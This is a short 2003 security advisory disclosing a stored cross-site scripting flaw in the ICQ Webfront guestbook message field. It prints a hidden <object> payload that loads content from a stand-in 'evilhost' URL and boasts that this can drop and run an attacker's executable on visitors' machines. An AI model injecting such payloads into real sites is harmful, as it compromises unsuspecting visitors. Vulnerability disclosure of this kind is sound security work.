- EXPL-A-2003-024 exploitlabs.com Advisory 024
-= ICQ Webfront =-
Donnie Werner Sept 09 2003 exploitlabs.com
note: this is not http://www.securiteam.com/windowsntfocus/5QP0N2K40I.html
ICQ Webfront guestbook
The ICQ Web Front is a simple tool designed for creating your very own Web site, which communicates directly with your ICQ. The pages of your Web site are stored in your PC, and when you are online your PC acts as a mini server, which other ICQ users and the Internet community at large can connect to and view. The ICQ Web Front will enable other ICQ and Internet users to request a chat with you, send messages directly to your Contact List, view your personal details including your picture, and even download pre-defined files from your hard disk.
message field is vuln to all xss issues to be stored for other visitors to have executed upon them as the page loads.
<object style="display:none" data="http://evilhost/bad.asp"> </object>
dropping and executing a .exe of the attackers choice on vunerable browsers ala eeye or malware's mad <object> teknikz who says you cant root via the XSS !!!
remote frame content inclusion
etc etc etc...
yeh, sabotage your visitors
yeh, visitors/attackers sabotage you and visitors
No fix on 0day
Concurrent with this advisory email@example.com
Donnie Werner firstname.lastname@example.org
Original advisory may be found at http://exploitlabs.com/files/advisories/EXPL-A-2003-024-icq-webfront.txt